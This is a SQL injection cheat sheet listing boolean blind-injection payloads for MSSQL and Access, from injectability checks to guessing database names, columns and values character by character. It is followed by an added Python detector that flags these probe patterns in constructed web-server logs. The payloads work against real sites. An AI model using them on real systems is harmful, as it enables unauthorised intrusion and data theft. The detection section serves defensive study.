1. Check whether injection is possible: ;and 1=1 ;and 1=2
2. Preliminary check for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [query condition] and ''='
4. When a search does not filter the parameter: 'and [query condition] and '%25'='
5. Determine the database system:
;and (select count(*) from sysobjects)>0   mssql
;and (select count(*) from msysobjects)>0   access
6. Guess the database: ;and (select Count(*) from [database name])>0
7. Guess the column: ;and (select Count(column name) from database name)>0
8. Guess the record length in the column: ;and (select top 1 len(column name) from database name)>0
9. (1) Guess the ASCII value of the column (Access)
;and (select top 1 asc(mid(column name,1,1)) from database name)>0
(2) Guess the ASCII value of the column (MSSQL)
;and (select top 1 unicode(substring(column name,1,1)) from database name)>0
10. Test the privilege structure (MSSQL)
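Detection logic for the probe sequence in steps 1 through 9, written as an added example from the defender's side; it is not part of the original cheat sheet. It scans constructed web-server log lines (the IPs, paths and the "admin"/"name" table and column names are placeholders) for the probe families above and counts them per client, since the ordered sequence from one source is what identifies a blind-injection walk.

```python
import re
from urllib.parse import unquote_plus

# Probe families taken from the numbered steps above, applied to the
# URL-decoded request target so encoded spaces and the '%25' quote trick
# in step 4 are normalised before matching.
PROBES = {
    "boolean-tautology": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "mssql-user-check": re.compile(r"\band\s+user\s*>\s*0\b", re.I),
    "string-context": re.compile(r"'\s*and\b.*\band\s*'%?'\s*=\s*'", re.I),
    "catalog-probe": re.compile(r"\bfrom\s+m?sysobjects\b", re.I),
    "row-count-guess": re.compile(r"\bselect\s+count\s*\(", re.I),
    "length-guess": re.compile(r"\bselect\s+top\s+1\s+len\s*\(", re.I),
    "char-guess": re.compile(r"\b(asc\s*\(\s*mid|unicode\s*\(\s*substring)\s*\(", re.I),
}

# Constructed combined-log lines (not real traffic); "admin" and "name" are
# placeholders standing in for the page's [database name] / column name.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /show.asp?id=12 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /show.asp?id=12%20and%201=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /show.asp?id=12%20and%201=2 HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /show.asp?id=12;and%20user>0 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /show.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.asp?q=abc'%20and%20(select%20top%201%20unicode(substring(name,1,1))%20from%20admin)>0%20and%20'%25'=' HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /search.asp?q=len%20and%20count HTTP/1.1" 200 300
"""

def extract_target(line: str) -> str:
    """Pull the request target out of a combined-log line and URL-decode it."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)\s+HTTP/', line)
    return unquote_plus(m.group(1)) if m else ""

def classify(line: str) -> list[str]:
    """Return the probe families one log line matches (empty list if none)."""
    target = extract_target(line)
    return [name for name, rx in PROBES.items() if rx.search(target)]

def scan(log: str) -> dict[str, dict[str, int]]:
    """Count matched probe families per client IP across the whole log."""
    hits: dict[str, dict[str, int]] = {}
    for line in log.splitlines():
        tags = classify(line)
        if tags:
            per_ip = hits.setdefault(line.split(" ", 1)[0], {})
            for t in tags:
                per_ip[t] = per_ip.get(t, 0) + 1
    return hits
```

A single tautology hit is weak evidence on its own; alerting on a client that accumulates several families in a short window is what separates this walk from noise.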